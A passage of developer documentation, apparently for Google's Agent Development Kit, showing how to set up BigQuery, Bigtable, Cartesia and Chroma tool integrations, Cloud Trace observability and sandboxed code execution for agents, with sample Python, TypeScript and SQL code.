failed_session_id STRING; -- Find a recent failed session SET failed_session_id = ( SELECT session_id FROM `your-gcp-project-id.your-dataset-id.agent_events_v2` WHERE error_message IS NOT NULL ORDER BY timestamp DESC LIMIT 1 ); -- Reconstruct the full conversation context WITH SessionContext AS ( SELECT session_id, STRING_AGG(CONCAT(event_type, ': ', COALESCE(TO_JSON_STRING(content), '')), '\n' ORDER BY timestamp) as full_history FROM `your-gcp-project-id.your-dataset-id.agent_events_v2` WHERE session_id = failed_session_id GROUP BY session_id ) -- Ask Gemini to diagnose the issue SELECT session_id, AI.GENERATE( ('Analyze this conversation log and explain the root cause of the failure. Log: ', full_history), connection_id => 'your-gcp-project-id.us.my-connection', endpoint => 'gemini-2.5-flash' ).result AS root_cause_explanation FROM SessionContext; ``` ## Conversational Analytics in BigQuery You can also use [BigQuery Conversational Analytics](https://cloud.google.com/bigquery/docs/conversational-analytics) to analyze your agent logs using natural language. Use this tool to answer questions like: - "Show me the error rate over time" - "What are the most common tool calls?" - "Identify sessions with high token usage" ## Looker Studio Dashboard You can visualize your agent's performance using our pre-built [Looker Studio Dashboard template](https://lookerstudio.google.com/c/reporting/f1c5b513-3095-44f8-90a2-54953d41b125/page/8YdhF). To connect this dashboard to your own BigQuery table, use the following link format, replacing the placeholders with your specific project, dataset, and table IDs: ```text https://lookerstudio.google.com/reporting/create?c.reportId=f1c5b513-3095-44f8-90a2-54953d41b125&ds.ds3.connector=bigQuery&ds.ds3.type=TABLE&ds.ds3.projectId=&ds.ds3.datasetId=&ds.ds3.tableId= ``` ## Additional resources - [BigQuery Storage Write API](https://cloud.google.com/bigquery/docs/write-api) - [Introduction to Object Tables](https://cloud.google.com/bigquery/docs/object-tables-intro) - [Interactive Demo Notebook](https://github.com/haiyuan-eng-google/demo_BQ_agent_analytics_plugin_notebook) # BigQuery tool for ADK Supported in ADKPython v1.1.0 These are a set of tools aimed to provide integration with BigQuery, namely: - **`list_dataset_ids`**: Fetches BigQuery dataset ids present in a GCP project. - **`get_dataset_info`**: Fetches metadata about a BigQuery dataset. - **`list_table_ids`**: Fetches table ids present in a BigQuery dataset. - **`get_table_info`**: Fetches metadata about a BigQuery table. - **`execute_sql`**: Runs a SQL query in BigQuery and fetch the result. - **`forecast`**: Runs a BigQuery AI time series forecast using the `AI.FORECAST` function. - **`ask_data_insights`**: Answers questions about data in BigQuery tables using natural language. They are packaged in the toolset `BigQueryToolset`. ```py # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import asyncio from google.adk.agents import Agent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.adk.tools.bigquery import BigQueryCredentialsConfig from google.adk.tools.bigquery import BigQueryToolset from google.adk.tools.bigquery.config import BigQueryToolConfig from google.adk.tools.bigquery.config import WriteMode from google.genai import types import google.auth # Define constants for this example agent AGENT_NAME = "bigquery_agent" APP_NAME = "bigquery_app" USER_ID = "user1234" SESSION_ID = "1234" GEMINI_MODEL = "gemini-2.0-flash" # Define a tool configuration to block any write operations tool_config = BigQueryToolConfig(write_mode=WriteMode.BLOCKED) # Use Application Default Credentials (ADC) for BigQuery authentication # https://cloud.google.com/docs/authentication/provide-credentials-adc application_default_credentials, _ = google.auth.default() credentials_config = BigQueryCredentialsConfig( credentials=application_default_credentials ) # Instantiate a BigQuery toolset bigquery_toolset = BigQueryToolset( credentials_config=credentials_config, bigquery_tool_config=tool_config ) # Agent Definition bigquery_agent = Agent( model=GEMINI_MODEL, name=AGENT_NAME, description=( "Agent to answer questions about BigQuery data and models and execute" " SQL queries." ), instruction="""\ You are a data science agent with access to several BigQuery tools. Make use of those tools to answer the user's questions. """, tools=[bigquery_toolset], ) # Session and Runner session_service = InMemorySessionService() session = asyncio.run( session_service.create_session( app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID ) ) runner = Runner( agent=bigquery_agent, app_name=APP_NAME, session_service=session_service ) # Agent Interaction def call_agent(query): """ Helper function to call the agent with a query. """ content = types.Content(role="user", parts=[types.Part(text=query)]) events = runner.run(user_id=USER_ID, session_id=SESSION_ID, new_message=content) print("USER:", query) for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("AGENT:", final_response) call_agent("Are there any ml datasets in bigquery-public-data project?") call_agent("Tell me more about ml_datasets.") call_agent("Which all tables does it have?") call_agent("Tell me more about the census_adult_income table.") call_agent("How many rows are there per income bracket?") call_agent( "What is the statistical correlation between education_num, age, and the income_bracket?" ) ``` Note: If you want to access a BigQuery data agent as a tool, see [Data Agents tools for ADK](https://google.github.io/adk-docs/integrations/data-agent/index.md). # Bigtable tool for ADK Supported in ADKPython v1.12.0 These are a set of tools aimed to provide integration with Bigtable, namely: - **`list_instances`**: Fetches Bigtable instances in a Google Cloud project. - **`get_instance_info`**: Fetches metadata instance information in a Google Cloud project. - **`list_tables`**: Fetches tables in a GCP Bigtable instance. - **`get_table_info`**: Fetches metadata table information in a GCP Bigtable. - **`execute_sql`**: Runs a SQL query in Bigtable table and fetch the result. They are packaged in the toolset `BigtableToolset`. ```py # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import asyncio from google.adk.agents import Agent from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from google.adk.tools.google_tool import GoogleTool from google.adk.tools.bigtable import query_tool from google.adk.tools.bigtable.settings import BigtableToolSettings from google.adk.tools.bigtable.bigtable_credentials import BigtableCredentialsConfig from google.adk.tools.bigtable.bigtable_toolset import BigtableToolset from google.genai import types from google.adk.tools.tool_context import ToolContext import google.auth from google.auth.credentials import Credentials # Define constants for this example agent AGENT_NAME = "bigtable_agent" APP_NAME = "bigtable_app" USER_ID = "user1234" SESSION_ID = "1234" GEMINI_MODEL = "gemini-2.5-flash" # Define Bigtable tool config with read capability set to allowed. tool_settings = BigtableToolSettings() # Define a credentials config - in this example we are using application default # credentials # https://cloud.google.com/docs/authentication/provide-credentials-adc application_default_credentials, _ = google.auth.default() credentials_config = BigtableCredentialsConfig( credentials=application_default_credentials ) # Instantiate a Bigtable toolset bigtable_toolset = BigtableToolset( credentials_config=credentials_config, bigtable_tool_settings=tool_settings ) # Optional # Create a wrapped function tool for the agent on top of the built-in # `execute_sql` tool in the bigtable toolset. # For example, this customized tool can perform a dynamically-built query. def count_rows_tool( table_name: str, credentials: Credentials, # GoogleTool handles `credentials` settings: BigtableToolSettings, # GoogleTool handles `settings` tool_context: ToolContext, # GoogleTool handles `tool_context` ): """Counts the total number of rows for a specified table. Args: table_name: The name of the table for which to count rows. Returns: The total number of rows in the table. """ # Replace the following settings for a specific bigtable database. PROJECT_ID = "" INSTANCE_ID = "" query = f""" SELECT count(*) FROM {table_name} """ return query_tool.execute_sql( project_id=PROJECT_ID, instance_id=INSTANCE_ID, query=query, credentials=credentials, settings=settings, tool_context=tool_context, ) # Agent Definition bigtable_agent = Agent( model=GEMINI_MODEL, name=AGENT_NAME, description=( "Agent to answer questions about bigtable database and execute SQL queries." ), instruction="""\ You are a data assistant agent with access to several bigtable tools. Make use of those tools to answer the user's questions. """, tools=[ bigtable_toolset, # Add customized bigtable tool based on the built-in bigtable toolset. GoogleTool( func=count_rows_tool, credentials_config=credentials_config, tool_settings=tool_settings, ), ], ) # Session and Runner session_service = InMemorySessionService() session = asyncio.run( session_service.create_session( app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID ) ) runner = Runner( agent=bigtable_agent, app_name=APP_NAME, session_service=session_service ) # Agent Interaction def call_agent(query): """ Helper function to call the agent with a query. """ content = types.Content(role="user", parts=[types.Part(text=query)]) events = runner.run(user_id=USER_ID, session_id=SESSION_ID, new_message=content) print("USER:", query) for event in events: if event.is_final_response(): final_response = event.content.parts[0].text print("AGENT:", final_response) # Replace the bigtable instance and table names below with your own. call_agent("List all tables in projects//instances/") call_agent("List the top 5 rows in ") ``` # Cartesia MCP tool for ADK Supported in ADKPythonTypeScript The [Cartesia MCP Server](https://github.com/cartesia-ai/cartesia-mcp) connects your ADK agent to the [Cartesia](https://cartesia.ai/) AI audio platform. This integration gives your agent the ability to generate speech, localize voices across languages, and create audio content using natural language. ## Use cases - **Text-to-Speech Generation**: Convert text into natural-sounding speech using Cartesia's diverse voice library, with control over voice selection and output format. - **Voice Localization**: Transform existing voices into different languages while preserving the original speaker's characteristics—ideal for multilingual content creation. - **Audio Infill**: Fill gaps between audio segments to create smooth transitions, useful for podcast editing or audiobook production. - **Voice Transformation**: Convert audio clips to sound like different voices from Cartesia's library. ## Prerequisites - Sign up for a [Cartesia account](https://play.cartesia.ai/sign-in) - Generate an [API key](https://play.cartesia.ai/keys) from the Cartesia playground ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters CARTESIA_API_KEY = "YOUR_CARTESIA_API_KEY" root_agent = Agent( model="gemini-2.5-pro", name="cartesia_agent", instruction="Help users generate speech and work with audio content", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command="uvx", args=["cartesia-mcp"], env={ "CARTESIA_API_KEY": CARTESIA_API_KEY, # "OUTPUT_DIRECTORY": "/path/to/output", # Optional } ), timeout=30, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; const CARTESIA_API_KEY = "YOUR_CARTESIA_API_KEY"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "cartesia_agent", instruction: "Help users generate speech and work with audio content", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "uvx", args: ["cartesia-mcp"], env: { CARTESIA_API_KEY: CARTESIA_API_KEY, // OUTPUT_DIRECTORY: "/path/to/output", // Optional }, }, }), ], }); export { rootAgent }; ``` ## Available tools | Tool | Description | | ---------------- | ---------------------------------------------- | | `text_to_speech` | Convert text to audio using a specified voice | | `list_voices` | List all available Cartesia voices | | `get_voice` | Get details about a specific voice | | `clone_voice` | Clone a voice from audio samples | | `update_voice` | Update an existing voice | | `delete_voice` | Delete a voice from your library | | `localize_voice` | Transform a voice into a different language | | `voice_change` | Convert an audio file to use a different voice | | `infill` | Fill gaps between audio segments | ## Configuration The Cartesia MCP server can be configured using environment variables: | Variable | Description | Required | | ------------------ | ---------------------------------------- | -------- | | `CARTESIA_API_KEY` | Your Cartesia API key | Yes | | `OUTPUT_DIRECTORY` | Directory to store generated audio files | No | ## Additional resources - [Cartesia MCP Server Repository](https://github.com/cartesia-ai/cartesia-mcp) - [Cartesia MCP Documentation](https://docs.cartesia.ai/integrations/mcp) - [Cartesia Playground](https://play.cartesia.ai/) # Chroma MCP tool for ADK Supported in ADKPythonTypeScript The [Chroma MCP Server](https://github.com/chroma-core/chroma-mcp) connects your ADK agent to [Chroma](https://www.trychroma.com/), an open-source embedding database. This integration gives your agent the ability to create collections, store documents, and retrieve information using semantic search, full text search, and metadata filtering. ## Use cases - **Semantic Memory for Agents**: Store conversation context, facts, or learned information that agents can retrieve later using natural language queries. - **Knowledge Base Retrieval**: Build a retrieval-augmented generation (RAG) system by storing documents and retrieving relevant context for responses. - **Persistent Context Across Sessions**: Maintain long-term memory across conversations, allowing agents to reference past interactions and accumulated knowledge. ## Prerequisites - **For local storage**: A directory path to persist data - **For Chroma Cloud**: A [Chroma Cloud](https://www.trychroma.com/) account with tenant ID, database name, and API key ## Use with agent ```python from google.adk.agents import Agent from google.adk.tools.mcp_tool import McpToolset from google.adk.tools.mcp_tool.mcp_session_manager import StdioConnectionParams from mcp import StdioServerParameters # For local storage, use: DATA_DIR = "/path/to/your/data/directory" # For Chroma Cloud, use: # CHROMA_TENANT = "your-tenant-id" # CHROMA_DATABASE = "your-database-name" # CHROMA_API_KEY = "your-api-key" root_agent = Agent( model="gemini-2.5-pro", name="chroma_agent", instruction="Help users store and retrieve information using semantic search", tools=[ McpToolset( connection_params=StdioConnectionParams( server_params=StdioServerParameters( command="uvx", args=[ "chroma-mcp", # For local storage, use: "--client-type", "persistent", "--data-dir", DATA_DIR, # For Chroma Cloud, use: # "--client-type", # "cloud", # "--tenant", # CHROMA_TENANT, # "--database", # CHROMA_DATABASE, # "--api-key", # CHROMA_API_KEY, ], ), timeout=30, ), ) ], ) ``` ```typescript import { LlmAgent, MCPToolset } from "@google/adk"; // For local storage, use: const DATA_DIR = "/path/to/your/data/directory"; // For Chroma Cloud, use: // const CHROMA_TENANT = "your-tenant-id"; // const CHROMA_DATABASE = "your-database-name"; // const CHROMA_API_KEY = "your-api-key"; const rootAgent = new LlmAgent({ model: "gemini-2.5-pro", name: "chroma_agent", instruction: "Help users store and retrieve information using semantic search", tools: [ new MCPToolset({ type: "StdioConnectionParams", serverParams: { command: "uvx", args: [ "chroma-mcp", // For local storage, use: "--client-type", "persistent", "--data-dir", DATA_DIR, // For Chroma Cloud, use: // "--client-type", // "cloud", // "--tenant", // CHROMA_TENANT, // "--database", // CHROMA_DATABASE, // "--api-key", // CHROMA_API_KEY, ], }, }), ], }); export { rootAgent }; ``` ## Available tools ### Collection management | Tool | Description | | ----------------------------- | -------------------------------------------------------- | | `chroma_list_collections` | List all collections with pagination support | | `chroma_create_collection` | Create a new collection with optional HNSW configuration | | `chroma_get_collection_info` | Get detailed information about a collection | | `chroma_get_collection_count` | Get the number of documents in a collection | | `chroma_modify_collection` | Update a collection's name or metadata | | `chroma_delete_collection` | Delete a collection | | `chroma_peek_collection` | View a sample of documents in a collection | ### Document operations | Tool | Description | | ------------------------- | ------------------------------------------------------------- | | `chroma_add_documents` | Add documents with optional metadata and custom IDs | | `chroma_query_documents` | Query documents using semantic search with advanced filtering | | `chroma_get_documents` | Retrieve documents by IDs or filters with pagination | | `chroma_update_documents` | Update existing documents' content, metadata, or embeddings | | `chroma_delete_documents` | Delete specific documents from a collection | ## Configuration The Chroma MCP server supports multiple client types to suit different needs: ### Client types | Client Type | Description | Key Arguments | | ------------ | ---------------------------------------------------------- | -------------------------------------------------------- | | `ephemeral` | In-memory storage, cleared on restart. Useful for testing. | None (default) | | `persistent` | File-based storage on your local machine | `--data-dir` | | `http` | Connect to a self-hosted Chroma server | `--host`, `--port`, `--ssl`, `--custom-auth-credentials` | | `cloud` | Connect to Chroma Cloud (api.trychroma.com) | `--tenant`, `--database`, `--api-key` | ### Environment variables You can also configure the client using environment variables. Command-line arguments take precedence over environment variables. | Variable | Description | | -------------------- | ---------------------------------------------------------- | | `CHROMA_CLIENT_TYPE` | Client type: `ephemeral`, `persistent`, `http`, or `cloud` | | `CHROMA_DATA_DIR` | Path for persistent local storage | | `CHROMA_TENANT` | Tenant ID for Chroma Cloud | | `CHROMA_DATABASE` | Database name for Chroma Cloud | | `CHROMA_API_KEY` | API key for Chroma Cloud | | `CHROMA_HOST` | Host for self-hosted HTTP client | | `CHROMA_PORT` | Port for self-hosted HTTP client | | `CHROMA_SSL` | Enable SSL for HTTP client (`true` or `false`) | | `CHROMA_DOTENV_PATH` | Path to `.env` file (defaults to `.chroma_env`) | ## Additional resources - [Chroma MCP Server Repository](https://github.com/chroma-core/chroma-mcp) - [Chroma Documentation](https://docs.trychroma.com/) - [Chroma Cloud](https://www.trychroma.com/) # Google Cloud Trace observability for ADK Supported in ADKPython With ADK, you’ve already capable of inspecting and observing your agent interaction locally utilizing the powerful web development UI discussed in [here](https://google.github.io/adk-docs/evaluate/#debugging-with-the-trace-view). However, if we aim for cloud deployment, we will need a centralized dashboard to observe real traffic. Cloud Trace is a component of Google Cloud Observability. It is a powerful tool for monitoring, debugging, and improving the performance of your applications by focusing specifically on tracing capabilities. For Agent Development Kit (ADK) applications, Cloud Trace enables comprehensive tracing, helping you understand how requests flow through your agent's interactions and identify performance bottlenecks or errors within your AI agents. ## Overview Cloud Trace is built on [OpenTelemetry](https://opentelemetry.io/), an open-source standard that supports many languages and ingestion methods for generating trace data. This aligns with observability practices for ADK applications, which also leverage OpenTelemetry-compatible instrumentation, allowing you to : - Trace agent interactions : Cloud Trace continuously gathers and analyzes trace data from your project, enabling you to rapidly diagnose latency issues and errors within your ADK applications. This automatic data collection simplifies the process of identifying problems in complex agent workflows. - Debug issues : Quickly diagnose latency issues and errors by analyzing detailed traces. Crucial for understanding issues that manifest as increased communication latency across different services or during specific agent actions like tool calls. - In-depth Analysis and Visualization: Trace Explorer is the primary tool for analyzing traces, offering visual aids like heatmaps for span duration and line charts for request/error rates. It also provides a spans table, groupable by service and operation, which gives one-click access to representative traces and a waterfall view to easily identify bottlenecks and sources of errors within your agent's execution path The following example will assume the following agent directory structure ```text working_dir/ ├── weather_agent/ │ ├── agent.py │ └── __init__.py └── deploy_agent_engine.py └── deploy_fast_api_app.py └── agent_runner.py ``` ```python # weather_agent/agent.py import os from google.adk.agents import Agent os.environ.setdefault("GOOGLE_CLOUD_PROJECT", "{your-project-id}") os.environ.setdefault("GOOGLE_CLOUD_LOCATION", "global") os.environ.setdefault("GOOGLE_GENAI_USE_VERTEXAI", "True") # Define a tool function def get_weather(city: str) -> dict: """Retrieves the current weather report for a specified city. Args: city (str): The name of the city for which to retrieve the weather report. Returns: dict: status and result or error msg. """ if city.lower() == "new york": return { "status": "success", "report": ( "The weather in New York is sunny with a temperature of 25 degrees" " Celsius (77 degrees Fahrenheit)." ), } else: return { "status": "error", "error_message": f"Weather information for '{city}' is not available.", } # Create an agent with tools root_agent = Agent( name="weather_agent", model="gemini-2.5-flash", description="Agent to answer questions using weather tools.", instruction="You must use the available tools to find an answer.", tools=[get_weather], ) ``` ## Cloud Trace Setup ### Setup for Agent Engine Deployment #### Agent Engine Deployment - from ADK CLI You can enable cloud tracing by adding `--trace_to_cloud` flag when deploying your agent using `adk deploy agent_engine` command for agent engine deployment. ```bash adk deploy agent_engine \ --project=$GOOGLE_CLOUD_PROJECT \ --region=$GOOGLE_CLOUD_LOCATION \ --staging_bucket=$STAGING_BUCKET \ --trace_to_cloud \ $AGENT_PATH ``` #### Agent Engine Deployment - from Python SDK If you prefer using Python SDK, you can enable cloud tracing by adding `enable_tracing=True` when initialize the `AdkApp` object ```python # deploy_agent_engine.py from vertexai.preview import reasoning_engines from vertexai import agent_engines from weather_agent.agent import root_agent import vertexai PROJECT_ID = "{your-project-id}" LOCATION = "{your-preferred-location}" STAGING_BUCKET = "{your-staging-bucket}" vertexai.init( project=PROJECT_ID, location=LOCATION, staging_bucket=STAGING_BUCKET, ) adk_app = reasoning_engines.AdkApp( agent=root_agent, enable_tracing=True, ) remote_app = agent_engines.create( agent_engine=adk_app, extra_packages=[ "./weather_agent", ], requirements=[ "google-cloud-aiplatform[adk,agent_engines]", ], ) ``` ### Setup for Cloud Run Deployment #### Cloud Run Deployment - from ADK CLI You can enable cloud tracing by adding `--trace_to_cloud` flag when deploying your agent using `adk deploy cloud_run` command for cloud run deployment. ```bash adk deploy cloud_run \ --project=$GOOGLE_CLOUD_PROJECT \ --region=$GOOGLE_CLOUD_LOCATION \ --trace_to_cloud \ $AGENT_PATH ``` If you want to enable cloud tracing and using a customized agent service deployment on Cloud Run, you can refer to the [Setup for Customized Deployment](#setup-for-customized-deployment) section below ### Setup for Customized Deployment #### From Built-in `get_fast_api_app` Module If you want to customize your own agent service, you can enable cloud tracing by initialize the FastAPI app using built-in `get_fast_api_app` module and set `trace_to_cloud=True` ```python # deploy_fast_api_app.py import os from google.adk.cli.fast_api import get_fast_api_app from fastapi import FastAPI # Set GOOGLE_CLOUD_PROJECT environment variable for cloud tracing os.environ.setdefault("GOOGLE_CLOUD_PROJECT", "alvin-exploratory-2") # Discover the `weather_agent` directory in current working dir AGENT_DIR = os.path.dirname(os.path.abspath(__file__)) # Create FastAPI app with enabled cloud tracing app: FastAPI = get_fast_api_app( agents_dir=AGENT_DIR, web=True, trace_to_cloud=True, ) app.title = "weather-agent" app.description = "API for interacting with the Agent weather-agent" # Main execution if __name__ == "__main__": import uvicorn uvicorn.run(app, host="0.0.0.0", port=8080) ``` #### From Customized Agent Runner If you want to fully customize your ADK agent runtime, you can enable cloud tracing by using `CloudTraceSpanExporter` module from Opentelemetry. ```python # agent_runner.py from google.adk.runners import Runner from google.adk.sessions import InMemorySessionService from weather_agent.agent import root_agent as weather_agent from google.genai.types import Content, Part from opentelemetry import trace from opentelemetry.exporter.cloud_trace import CloudTraceSpanExporter from opentelemetry.sdk.trace import export from opentelemetry.sdk.trace import TracerProvider APP_NAME = "weather_agent" USER_ID = "u_123" SESSION_ID = "s_123" provider = TracerProvider() processor = export.BatchSpanProcessor( CloudTraceSpanExporter(project_id="{your-project-id}") ) provider.add_span_processor(processor) trace.set_tracer_provider(provider) session_service = InMemorySessionService() runner = Runner(agent=weather_agent, app_name=APP_NAME, session_service=session_service) async def main(): session = await session_service.get_session( app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID ) if session is None: session = await session_service.create_session( app_name=APP_NAME, user_id=USER_ID, session_id=SESSION_ID ) user_content = Content( role="user", parts=[Part(text="what's weather in paris?")] ) final_response_content = "No response" async for event in runner.run_async( user_id=USER_ID, session_id=SESSION_ID, new_message=user_content ): if event.is_final_response() and event.content and event.content.parts: final_response_content = event.content.parts[0].text print(final_response_content) if __name__ == "__main__": import asyncio asyncio.run(main()) ``` ## Inspect Cloud Traces After the setup is complete, whenever you interact with the agent it will automatically send trace data to Cloud Trace. You can inspect the traces by going to [console.cloud.google.com](https://console.cloud.google.com) and visit the Trace Explorer on the configured Google Cloud Project And then you will see all available traces produced by ADK agent which configured in several span names such as `invocation` , `agent_run` . `call_llm` and `execute_tool` If you click on one of the traces, you will see the waterfall view of the detailed process, similar to what we see in the web development UI with `adk web` command. ## Resources - [Google Cloud Trace Documentation](https://cloud.google.com/trace) # Agent Engine Code Execution tool for ADK Supported in ADKPython v1.17.0Preview The Agent Engine Code Execution ADK Tool provides a low-latency, highly efficient method for running AI-generated code using the [Google Cloud Agent Engine](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/overview) service. This tool is designed for fast execution, tailored for agentic workflows, and uses sandboxed environments for improved security. The Code Execution tool allows code and data to persist over multiple requests, enabling complex, multi-step coding tasks, including: - **Code development and debugging:** Create agent tasks that test and iterate on versions of code over multiple requests. - **Code with data analysis:** Upload data files up to 100MB, and run multiple code-based analyses without the need to reload data for each code run. This code execution tool is part of the Agent Engine suite, however you do not have to deploy your agent to Agent Engine to use it. You can run your agent locally or with other services and use this tool. For more information about the Code Execution feature in Agent Engine, see the [Agent Engine Code Execution](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/code-execution/overview) documentation. Preview release The Agent Engine Code Execution feature is a Preview release. For more information, see the [launch stage descriptions](https://cloud.google.com/products#product-launch-stages). ## Use the Tool Using the Agent Engine Code Execution tool requires that you create a sandbox environment with Google Cloud Agent Engine before using the tool with an ADK agent. To use the Code Execution tool with your ADK agent: 1. Follow the instructions in the Agent Engine [Code Execution quickstart](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/code-execution/quickstart) to create a code execution sandbox environment. 1. Create an ADK agent with settings to access the Google Cloud project where you created the sandbox environment. 1. The following code example shows an agent configured to use the Code Executor tool. Replace `SANDBOX_RESOURCE_NAME` with the sandbox environment resource name you created. ```python from google.adk.agents.llm_agent import Agent from google.adk.code_executors.agent_engine_sandbox_code_executor import AgentEngineSandboxCodeExecutor root_agent = Agent( model="gemini-2.5-flash", name="agent_engine_code_execution_agent", instruction="You are a helpful agent that can write and execute code to answer questions and solve problems.", code_executor=AgentEngineSandboxCodeExecutor( sandbox_resource_name="SANDBOX_RESOURCE_NAME", ), ) ``` For details on the expected format of the `sandbox_resource_name` value, and the alternative `agent_engine_resource_name` parameter, see [Configuration parameters](#config-parameters). For a more advanced example, including recommended system instructions for the tool, see the [Advanced example](#advanced-example) or the full [agent code example](https://github.com/google/adk-python/tree/main/contributing/samples/agent_engine_code_execution). ## How it works The `AgentEngineCodeExecutor` Tool maintains a single sandbox throughout an agent's task, meaning the sandbox's state persists across all operations within an ADK workflow session. 1. **Sandbox creation:** For multi-step tasks requiring code execution, the Agent Engine creates a sandbox with specified language and machine configurations, isolating the code execution environment. If no sandbox is pre-created, the code execution tool will automatically create one using default settings. 1. **Code execution with persistence:** AI-generated code for a tool call is streamed to the sandbox and then executed within the isolated environment. After execution, the sandbox *remains active* for subsequent tool calls within the same session, preserving variables, imported modules, and file state for the next tool call from the same agent. 1. **Result retrieval:** The standard output, and any captured error streams are collected and passed back to the calling agent. 1. **Sandbox clean up:** Once the agent task or conversation concludes, the agent can explicitly delete the sandbox, or rely on the TTL feature of the sandbox specified when creating the sandbox. ## Key benefits - **Persistent state:** Solve complex tasks where data manipulation or variable context must carry over between multiple tool calls. - **Targeted Isolation:** Provides robust process-level isolation, ensuring that tool code execution is safe while remaining lightweight. - **Agent Engine integration:** Tightly integrated into the Agent Engine tool-use and orchestration layer. - **Low-latency performance:** Designed for speed, allowing agents to execute complex tool-use workflows efficiently without significant overhead. - **Flexible compute configurations:** Create sandboxes with specific programming language, processing power, and memory configurations. ## System requirements¶ The following requirements must be met to successfully use the Agent Engine Code Execution tool with your ADK agents: - Google Cloud project with Vertex API enabled - Agent's service account requires **roles/aiplatform.user** role, which allow it to: - Create, get, list and delete code execution sandboxes - Execute code execution sandbox ## Configuration parameters The Agent Engine Code Execution tool has the following parameters. You must set one of the following resource parameters: - **`sandbox_resource_name`** : A sandbox resource path to an existing sandbox environment it uses for each tool call. The expected string format is as follows: ```text projects/{$PROJECT_ID}/locations/{$LOCATION_ID}/reasoningEngines/{$REASONING_ENGINE_ID}/sandboxEnvironments/{$SANDBOX_ENVIRONMENT_ID} # Example: projects/my-vertex-agent-project/locations/us-central1/reasoningEngines/6842888880301111172/sandboxEnvironments/6545148888889161728 ``` - **`agent_engine_resource_name`**: Agent Engine resource name where the tool creates a sandbox environment. The expected string format is as follows: ```text projects/{$PROJECT_ID}/locations/{$LOCATION_ID}/reasoningEngines/{$REASONING_ENGINE_ID} # Example: projects/my-vertex-agent-project/locations/us-central1/reasoningEngines/6842888880301111172 ``` You can use Google Cloud Agent Engine's API to configure Agent Engine sandbox environments separately using a Google Cloud client connection, including the following settings: - **Programming languages,** including Python and JavaScript - **Compute environment**, including CPU and memory sizes For more information on connecting to Google Cloud Agent Engine and configuring sandbox environments, see the Agent Engine [Code Execution quickstart](https://cloud.google.com/vertex-ai/generative-ai/docs/agent-engine/code-execution/quickstart#create_a_sandbox). ## Advanced example The following example code shows how to implement use of the Code Executor tool in an ADK agent. This example includes a `base_system_instruction` clause to set the operating guidelines for code execution. This instruction clause is optional, but strongly recommended for getting the best results from this tool. ````python from google.adk.agents.llm_agent import Agent from google.adk.code_executors.agent_engine_sandbox_code_executor import AgentEngineSandboxCodeExecutor def base_system_instruction(): """Returns: data science agent system instruction.""" return """ # Guidelines **Objective:** Assist the user in achieving their data analysis goals, **with emphasis on avoiding assumptions and ensuring accuracy.** Reaching that goal can involve multiple steps. When you need to generate code, you **don't** need to solve the goal in one go. Only generate the next step at a time. **Code Execution:** All code snippets provided will be executed within the sandbox environment. **Statefulness:** All code snippets are executed and the variables stays in the environment. You NEVER need to re-initialize variables. You NEVER need to reload files. You NEVER need to re-import libraries. **Output Visibility:** Always print the output of code execution to visualize results, especially for data exploration and analysis. For example: - To look a the shape of a pandas.DataFrame do: ```tool_code print(df.shape) ``` The output will be presented to you as: ```tool_outputs (49, 7) ``` - To display the result of a numerical computation: ```tool_code x = 10 ** 9 - 12 ** 5 print(f'{{x=}}') ``` The output will be presented to you as: ```tool_outputs x=999751168 ``` - You **never** generate ```tool_outputs yourself. - You can then use this output to decide on next steps. - Print just variables (e.g., `print(f'{{variable=}}')`. **No Assumptions:** **Crucially, avoid making assumptions about the nature of the data or column names.** Base findings solely on the data itself. Always use the information obtained from `explore_df` to guide your analysis. **Available files:** Only use the files that are available as specified in the list of available files. **Data in prompt:** Some queries contain the input data directly in the prompt. You have to parse that data into a pandas DataFrame. ALWAYS parse all the data. NEVER edit the data that are given to you. **Answerability:** Some queries may not be answerable with the available data. In those cases, inform the user why you cannot process their query and suggest what type of data would be needed to fulfill their request. """ root_agent = Agent( model="gemini-2.5-flash", name="agent_engine_code_execution_agent", instruction=base_system_instruction() + """ You need to assist the user with their queries by looking at the data and the context in the conversation. You final answer should summarize the code and code execution relevant to the user query. You should include all pieces of data to answer the user query, such as the table from code execution results. If you cannot answer the question directly, you should follow the guidelines above to generate the next step. If the question can be answered directly with writing any code, you should do that. If you doesn't have enough data to answer the question, you should ask for clarification from the user. You should NEVER install any package on your own like `pip install ...`. When plotting trends, you should make sure to sort and order the data by the x-axis. """, code_executor=AgentEngineSandboxCodeExecutor( # Replace with your sandbox resource name if you already have one. sandbox_resource_name="SANDBOX_RESOURCE_NAME", # Replace with agent engine resource name used for creating sandbox if # sandbox_resource_name is not set: # agent_engine_resource_name="AGENT_ENGINE_RESOURCE_NAME", ), ) ```` For a complete version of an ADK agent using this example code, see the [agent_engine_code_execution sample](https://github.com/google/adk-python/tree/main/contributing/samples/agent_engine_code_execution). # Gemini API Code Execution tool for ADK Supported in ADKPython v0.1.0Java v0.2.0 The `built_in_code_execution` tool enables the agent to execute code, specifically when using Gemini 2 and higher models. This 